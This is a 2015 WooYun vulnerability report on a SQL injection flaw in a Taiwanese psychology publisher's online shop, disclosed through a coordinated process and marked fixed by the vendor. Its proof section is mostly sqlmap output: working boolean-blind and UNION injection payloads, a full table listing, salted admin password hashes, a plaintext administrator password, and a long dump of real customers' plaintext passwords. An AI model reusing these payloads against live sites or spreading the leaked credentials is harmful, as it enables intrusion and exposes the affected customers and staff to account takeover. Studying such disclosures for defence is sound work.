漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0155064
漏洞标题:心理出版社股份有限公司主站存在SQL植入漏洞(1.5W名用戶明文密碼\郵箱地址及電話號碼泄露)(臺灣地區)
相关厂商:心理出版社股份有限公司
漏洞作者: 路人甲
提交时间:2015-11-23 18:08
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-26: 厂商已经确认,细节仅向厂商公开
2015-12-06: 细节向核心白帽子及相关领域专家公开
2015-12-16: 细节向普通白帽子公开
2015-12-26: 细节向实习白帽子公开
2016-01-11: 细节向公众公开
简要描述:
心理出版社創立於 1979年4月4日,由一群具有共同教育理念的學者籌組而成。
在「重質不重量」的政策考量下,本公司之出版品每年均維持一定水準的出書量。 1995年以國家講座主持人,台灣大學黃光國教授「 知識與行動 」一書榮獲金鼎獎「推薦優良圖書」之殊榮; 1997 年「諮商實務」有聲圖書榮獲「國立教育資料館優良教學錄影帶優等獎」; 2003 年國家講座台灣師大楊深坑教授「 科學理論與教育學發展 」一書,勇奪金鼎獎;隔年, 2004 年再以國立政治大學教育學系周祝瑛教授「誰捉弄了台灣教改?」一書入圍金鼎獎。
本公司出版方向涵蓋心理學、輔導諮商、心理治療、高等教育、中等教育、幼兒教育、特殊教育、教育研究及各級師資教育等專業領域,社會工作、社會學、性別教育等人文社會科學,以及各類測驗評量工具,並代理進口西文書。
心理出版社一貫秉持創新與回饋的理念,以嚴謹的態度出版優良的出版品,為學者專家與讀者之間搭起一座雙向的橋樑,永為學界提供高品質的服務。
详细说明:
地址:http://**.**.**.**/booklist.php?cPath=24&cate_id=64
漏洞证明:
<code>---
Parameter: cate_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cPath=24&cate_id=64 AND 4159=4159
Type: UNION query
Title: MySQL UNION query (56) - 32 columns
Payload: cPath=24&cate_id=64 UNION ALL SELECT 56,56,56,56,CONCAT(0x7170787171,0x646174595942726456415a73524f674a4f6e7a696a6a6f664a72634e6364696c63676b644b527747,0x716a626b71),56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56#
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current user: 'psyutf8@localhost'
current user is DBA: False
database management system users [1]:
[*] 'psyutf8'@'localhost'
Database: psyutf8
+---------------------------------------------+---------+
| Table | Entries |
+---------------------------------------------+---------+
| psy_order_detail | 16919 |
| customers | 15937 |
| address_book | 15936 |
| customers_info | 11575 |
| psy_order | 8510 |
| epaper_member | 3507 |
| sessions | 3106 |
| products_to_categories | 1579 |
| products | 1574 |
| products_description | 1574 |
| products_extension_exam | 924 |
| products_extension | 792 |
| whos_online | 301 |
| products_to_agetpye | 288 |
| countries | 239 |
| configuration | 212 |
| zones | 206 |
| epaper_history | 148 |
| psy_pdt_option | 145 |
| categories | 142 |
| categories_description | 142 |
| banners_history | 76 |
| psy_news | 72 |
| admin_files | 70 |
| tbook | 32 |
| forum_smile | 31 |
| orders_total | 25 |
| configuration_group | 16 |
| psy_download | 16 |
| content | 12 |
| content_section | 11 |
| manufacturers | 11 |
| manufacturers_info | 11 |
| products_options_values | 11 |
| products_options_values_to_products_options | 11 |
| test_mail_send | 10 |
| orders_status_history | 9 |
| orders | 7 |
| orders_products | 7 |
| address_format | 6 |
| orders_products_attributes | 6 |
| products_options | 6 |
| admin | 5 |
| admin_groups | 5 |
| products_attributes | 5 |
| products_xsell | 5 |
| counter | 4 |
| psy_discount | 4 |
| psy_link | 4 |
| forum_post | 3 |
| forum_postext | 3 |
| orders_status | 3 |
| banners | 2 |
| currencies | 2 |
| forum_topic | 2 |
| products_notifications | 2 |
| administrators | 1 |
| geo_zones | 1 |
| languages | 1 |
| newsletters | 1 |
| products_attributes_download | 1 |
| tax_class | 1 |
| tax_rates | 1 |
| test | 1 |
| zones_to_geo_zones | 1 |
+---------------------------------------------+---------+
Database: information_schema
+---------------------------------------------+---------+
| Table | Entries |
+---------------------------------------------+---------+
| COLUMNS | 670 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| STATISTICS | 94 |
| TABLES | 89 |
| KEY_COLUMN_USAGE | 79 |
| TABLE_CONSTRAINTS | 69 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 4 |
| SCHEMATA | 2 |
| USER_PRIVILEGES | 1 |
+---------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: psyutf8
Table: admin
[1 column]
+----------------+-------------+
| Column | Type |
+----------------+-------------+
| admin_password | varchar(40) |
+----------------+-------------+
Database: psyutf8
Table: administrators
[1 column]
+------------+-------------+
| Column | Type |
+------------+-------------+
| admin_pass | varchar(40) |
+------------+-------------+
Database: psyutf8
Table: customers
[1 column]
+--------------------+-------------+
| Column | Type |
+--------------------+-------------+
| customers_password | varchar(40) |
+--------------------+-------------+
Database: psyutf8
Table: admin
[5 entries]
+-------------------------------------+
| admin_password |
+-------------------------------------+
| 1247cfaba6684daf0a564edd5e7dc570:5e |
| 4f5f468d3f46006bb0c1b38a74367c47:d3 |
| 66f383de321e21fecade5bacf05ff2a1:f9 |
| 71f014f1a8511f4b5a00f41760c002a4:b2 |
| c98b8dcbb116c0ef35aa36c697a8affb:02 |
+-------------------------------------+
Database: psyutf8
Table: administrators
[1 entry]
+------------+
| admin_pass |
+------------+
| admin |
+------------+
Database: psyutf8
Table: customers
[15909 entries]
+--------------------------------------------+
| customers_password |
+--------------------------------------------+
| !nekki@ |
| !qazxsw2 |
| &*)!)* |
| **Ab123 |
| ,x2j92 |
| ...... |
| /.,m014789* |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
修复方案:
上WAF。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:16
确认时间:2015-11-26 14:27
厂商回复:
感謝通報
最新状态:
2015-12-21:已修復